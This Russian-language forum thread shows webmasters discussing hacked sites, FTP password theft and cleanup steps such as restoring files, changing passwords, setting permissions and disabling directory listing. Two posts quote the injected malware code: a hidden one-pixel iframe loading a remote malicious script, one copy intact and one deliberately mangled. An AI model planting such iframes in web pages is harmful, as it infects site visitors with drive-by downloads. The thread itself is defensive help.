Сайт взломали. Удалось восстановить, но вопрос безопасности остался актуальным

Если есть известный клиент, значит и есть адреса где и что лежит, как говорится, самая безопасная Ось, это та, которая на фик ни кому не нужна, как Макинтош

 

Я вообще пользовался Дримвавером для редактирования и загрузки файлов - как думаете из него тоже могли
угнать пароли?
И насчет index.html - тоесть получается стоит все удалить и настроить htaccess чтобы не открывал папки?

права проверил, поставил на папки не выше 755

 

Поставить лицензионный Аутпост, грамотно его настроить и проблем нет вообще

 

ну наверное да
сделай правило если ненайдён index.* то выдаём страницу 404

 

В конце концов появился вирус, в файле входа в админ панель, антивирус сразу завизжал как только заметил это

 

Так что же будет лучше сделать?
Действие 1: удалить все файлы, сменить пароли, не сохранять пароли в фтп-клиенте, залить файлы из резервной копии.
Действие 2: поставить настройки в хтачесс на 404 ошибку (но в данном случае вирус то все равно останется)

 

А какой антивирь визжит? касперский поди? Так его хлебом некорми...

зачем удалять все? можно просто перезалить из дистрибутива зараженные файлы и все.
хотя первый раз вижу, чтобы вирус сидел в хтмл или пхп
У тебя появился iframe в индексах, этот код откуда-то все равно вписывается. Можно порыться в файлах и найти исходник.
Либо заменить все индексы, во всех директориях на дефолтные, т.е. - пустые + 644 (или даже 444).

 

а не получится так, что ни одна страница не откроется? ибо при вызове Index.php получим 404

сорри, слово ненайдён прочитал как найдён

 

agruts, Визжит Аваст и Хром, были отредактированы все файлы, содержащие фрейм, а также были изменены логин и пароль на фтп доступ. Исходник я давно уже нашел, он вытаскивал все глобальные переменные в коде, а также создавал фреймы во всех файлах индекс.хтмл. Не знаю что будет дальше, но посмотрим.

 

Видимо визжит он той причине, что конекте к Ftp вирь начинает начинает работу (с твоей машины) А AVP тогда его и замечает

 

трафик инспектор ?
надо смотреть что на 21 порту делается......

 

Сейчас вроде бы все оке спасибо всем за помощь!

 

напишите, как это должно записываться в htaccess ?

 

1) спрашиваем у яши http://yandex.ru/yandsearch?text=htaccess&stpar2=/h0/tm36/s3&stpar4=/s3
2) проваливаемся в http://www.iho.ru/faq/manual/htaccess.html
видим читаем :

Код (CODE):

1. Как поставить запрет на отображение содержимого директории при отсутствии индексного файла?
2.  
3. Предположим, что у вас вся графика, используемая на сайте находится в директории img.
4. Посетитель может набрать в адресной строке браузера эту директорию и увидеть список
5.  всех ваших графических файлов. Конечно, это не нанесет вам урона, но можно и не дать
6. такого просмотра посетителю. В .htaccess пишем:
7.  
8. Options -Indexes

неверим проверяем :
1) спрашиваем у яши http://yandex.ru/yandsearch?text=htaccess+Options+-Indexes+меню&stpar2=/h0/tm20/s1&stpar4=/s1
2) проваливаемся http://www.htaccess.net.ru/doc/htaccess/Options.php
читаем верим редактируем .htaccess радуемся запрету листинга

 

тоже на днях, точнее 20.02, взломали на Джумле 1.0.15. В индексе сайта, админке, в html в папке Cache был вставлен код:
"?<html><body><iframe src="http://betstarwager.cn/in.cgi?cocacola65" width=1 height=1 style="visibility: hidden"></iframe></body></html>>"
как только его убрал - все заработало. + на папку Cache доступ 777

вот это да... во всех папках где есть index.html вставлен этот код и папки что проверил на данный момент имеют атрибуты доступа или 755 или 777
напомните пожалуйсто где можно глянуть атрибуты для папок/файлов для joomla 1.0.15?
вот это да... прям бесят меня те подонки, которые мне столько работы сделали.
и подскажите основные моменты обезопасить себя от этой заразы.
спасибо.

 

Egoz, ну если например испльзуешь файлзилу, то просто заходишь в файлы сайта, правой кнопкой, атрибуты файла\папки. Все основные моменты уже были описаны в данной теме. Необходимо найти источник заразы, обезвредить его, удалить последствия, проставить нормальные атрибуты на файлы и папки и все будет также хорошо, как и у меня

 

WinSCP почему-то падает постоянно и нестабильно держит связь (хотя Тотал её держит ещё хуже). И вряд ли лучше того же тотала, если в нём пароль хранить. У меня тоже спёрли пароли именно из Тотала год назад и изгадили все index.html, но, правда, только этим всё и ограничилось.
Так что я теперь никогда не храню пароли в менеджерах, хотя это доставляет неудобства.

 

Люди добрые!! помогите и мне пожалуйста.. а то я маленькая и хрупкая ламерша.. и знать не знаю как со всей этой заразой бороться..

с неделю как на сайте завелся вирус, сначала просто при редактировании уже опублекованной статьи, редактор открывался в чистом виде и невозможно было зайти в хтмл-редактор, пока искала причину этих косяков.. поняла что таки вирус...
вроде стандартный Downloader.JS.Psyme.ct, угнал пароли с ФТР и вписал в index свой хтмл-код в виде

Код:
<____html><body><i_______frame
src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1 height=1
style="visibility: hidden"></i____frame> </body></____html>
я сменила все пароли доступа к фтп, к админке сайта, к админке хостинга.. потом пол ночи руками выковыривала из всех index вредоносный код, кстати говоря, проверка двумя антивирями.. не нашел таки вируса, значит новеньки.. вобщем почистила я все index..
но сегодня захожу в админку, открываю одну из статей в редакторе а потом всю это страницу вместе с редактором, через браузер открываю в хтмл и нахожу там этот чертов код..
в самом index.php сайта его нету, если открываю сайт в хтмл не заходя в админку тож нету..
а вот когда открываю из админки (открывается в блокноте в файле index2(1)) то код там... ну как его искоренить?!!

у меня несколько конкретных вопросов:
1) как найти виновный во всем этом бреде фаил
2) какие атрибуты и на какие папки поставить (777, 755 или...)
3) что будет если залить на сайт файлы из дистрибутива??
4) не прописалась ли какая зараза в ява-скриптах? и что еще нужно искать кроме данного зловредного кода?

и может я что-то еще упустила?

 

А сам компьютер хорошо почистила?
Каким антивирусником пользуешься и браузером?

 

чистила комп Авирой, каспером и д. вебом..)
браузер опера, маззила и ИЕ, во всех чистила хеши